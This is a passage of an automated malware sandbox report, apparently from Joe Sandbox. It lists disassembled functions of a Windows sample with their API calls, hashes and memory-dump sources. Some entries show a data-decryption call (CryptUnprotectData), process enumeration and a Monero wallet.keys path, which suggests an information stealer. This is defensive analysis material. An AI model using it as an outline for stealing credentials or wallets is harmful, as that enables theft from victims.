                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                              • Instruction ID: c9dfda24b818054dd9d34a4e867cba153c74cb6da39ee6a1190b7db1bc026e3c
                              • Opcode Fuzzy Hash: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                              • Instruction Fuzzy Hash: 21124172950118AAEB28FB60DC96FED7338AFD4304F4045A8B50A96191EF306F49CF92
                              Function 00CF60F7 Relevance: 9.1, Strings: 6, Instructions: 1633COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: :+s$BI^o$C"oI$KfnU$z[<$o/
                              • API String ID: 0-3130629219
                              • Opcode ID: 18b0c339f2ab16393856cec457af47c95074d2ec0a43e06c24590ae98ee5ce35
                              • Instruction ID: 312832fe18591bad1ee687b95f9df12bff0f2dc271667428a3067853eeb2719e
                              • Opcode Fuzzy Hash: 18b0c339f2ab16393856cec457af47c95074d2ec0a43e06c24590ae98ee5ce35
                              • Instruction Fuzzy Hash: 9DB207F360C204AFD3046E2DEC8567ABBE9EFD4720F1A863DE6C4C7744E63598058696
                              Function 00D05406 Relevance: 9.1, Strings: 6, Instructions: 1562COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,i4#$1o$BRl[$Oe|$hyM$oBYf
                              • API String ID: 0-1248956356
                              • Opcode ID: 24bb54afb3f278359ffa0f88d7ebad85b8992522b653dc71bef0180bff02acc4
                              • Instruction ID: 5c1f4e830096a07265a303f3f943ca5bd12ae7eaf4801bcbb3d099d6460b3acd
                              • Opcode Fuzzy Hash: 24bb54afb3f278359ffa0f88d7ebad85b8992522b653dc71bef0180bff02acc4
                              • Instruction Fuzzy Hash: 8EB207F3508204AFE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7744E63598058797
                              Function 0093C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                              • lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                              • lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                              • lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 2f0915dccc4ae97274cda47d4d7a19b553081f62ad46ef0c7e36bd645aa433e8
                              • Instruction ID: 1e1af2bb7ca56eb5f300981ef35d5520570fc5ed84d3b86205f4766f4bfdeaa5
                              • Opcode Fuzzy Hash: 2f0915dccc4ae97274cda47d4d7a19b553081f62ad46ef0c7e36bd645aa433e8
                              • Instruction Fuzzy Hash: CA4160B590421ADFCB10DFA0DD89BEEB7B8BB84704F1045A8E509A7280DB745A84CF91
                              Function 00937240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0093724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00937254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00937281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009372A4
                              • LocalFree.KERNEL32(?), ref: 009372AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                              • Instruction ID: 33147c00fbd003904ae1fd2f77b7a965b7fa9ef7bdca0c2a0fcf3959758a5f08
                              • Opcode Fuzzy Hash: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                              • Instruction Fuzzy Hash: 820112B5A40308BBDB54DFD4CD46F9E77B8EB44701F104554FB09BB2C0DA70AA408B66
                              Function 00949600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0094961E
                              • Process32First.KERNEL32(00950ACA,00000128), ref: 00949632
                              • Process32Next.KERNEL32(00950ACA,00000128), ref: 00949647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0094965C
                              • CloseHandle.KERNEL32(00950ACA), ref: 0094967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                              • Instruction ID: 47fd28335aa0f9c1f7755e50bb5227cc65701d1043fd2d67c10ea58bc0c9e2b8
                              • Opcode Fuzzy Hash: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                              • Instruction Fuzzy Hash: EE011E75A00208EBCB54DFA5CD58FEEB7F8EB48301F104188A909A7240DB349F80CF51
                              Function 00D01E61 Relevance: 6.6, Strings: 4, Instructions: 1598COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *|{$iwk$l|z${r
                              • API String ID: 0-650929242
                              • Opcode ID: 6ffc10f729c74c748951f666281e5fb9ea2c133e7fded20176c57ce260ea3a9a
                              • Instruction ID: 5ca0818b74a443827a1c3ad6a6f8c5f032c7cdc334e9212621cf048faa83929a
                              • Opcode Fuzzy Hash: 6ffc10f729c74c748951f666281e5fb9ea2c133e7fded20176c57ce260ea3a9a
                              • Instruction Fuzzy Hash: 16B208F360C6009FE704AE29EC8567EFBE5EF94320F16893DE6C587744EA3558018697
                              Function 00CF7BC2 Relevance: 6.6, Strings: 4, Instructions: 1597COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8w<$Z/wj$b,wc$].
                              • API String ID: 0-1289586338
                              • Opcode ID: d86ef7619ce821483704d7c63023775cd10ff20c16e27a2ba100638accf53653
                              • Instruction ID: 5f76de008bcf79bd86553fd4e885761b06d9ccf59b83b6f2a920873b92c202f2
                              • Opcode Fuzzy Hash: d86ef7619ce821483704d7c63023775cd10ff20c16e27a2ba100638accf53653
                              • Instruction Fuzzy Hash: 91B2F4F360C2109FE304AE29EC8567AFBE5EF94720F1A893DEAC4C7744E63558418796
                              Function 00CEF628 Relevance: 6.6, Strings: 4, Instructions: 1551COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ){$?K~$j=[V$@3
                              • API String ID: 0-1601152389
                              • Opcode ID: e02b345c81b94ae2a3250c07146a119eebb4359f35e54650beb885aa0af152c5
                              • Instruction ID: 1d3d15eb8d1c5d17367aba4903cf6bc5c50bc31abfbe93fcb1d4623d54ea1c11
                              • Opcode Fuzzy Hash: e02b345c81b94ae2a3250c07146a119eebb4359f35e54650beb885aa0af152c5
                              • Instruction Fuzzy Hash: CEB2E5B360C2009FE3046F29EC8567AFBE5EFD4720F1A892DE6C487744EA3558458B97
                              Function 00D00579 Relevance: 6.4, Strings: 4, Instructions: 1391COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: [=~$NZg~$_yO$M]
                              • API String ID: 0-1771313002
                              • Opcode ID: b20f6aa66261e977a300b903d035e3c8f26cfb5a4ec0568ee49ec21b2f4d4bff
                              • Instruction ID: 331c7bb80681941138dcb12ae819d191c6b108f09324c72b2d6a7d6c20144dda
                              • Opcode Fuzzy Hash: b20f6aa66261e977a300b903d035e3c8f26cfb5a4ec0568ee49ec21b2f4d4bff
                              • Instruction Fuzzy Hash: 57A206F360C3049FE304AE29EC8167AFBE5EF94760F1A893DE6C583744E63598058697
                              Function 00948680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009505B7), ref: 009486CA
                              • Process32First.KERNEL32(?,00000128), ref: 009486DE
                              • Process32Next.KERNEL32(?,00000128), ref: 009486F3
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • CloseHandle.KERNEL32(?), ref: 00948761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                              • Instruction ID: c0db3ac61baa30b64ca68c6e47b5f43ad4a5354aa8bf47803390946cb90668b5
                              • Opcode Fuzzy Hash: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                              • Instruction Fuzzy Hash: 95316B71941218ABDB24DF51CC51FEEB778EB84704F104299F50AA22A0DF306E85CFA2
                              Function 00948EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00935184,40000001,00000000,00000000,?,00935184), ref: 00948EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                              • Instruction ID: b0c454eb43ae3b25a8640a229e100861a52c8778d60d643c63b9d0b6c71a4290
                              • Opcode Fuzzy Hash: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                              • Instruction Fuzzy Hash: 0F111C74200204BFDB40DF64D884FAF33A9AF89700F109948F9198B250DB75EC85DB61
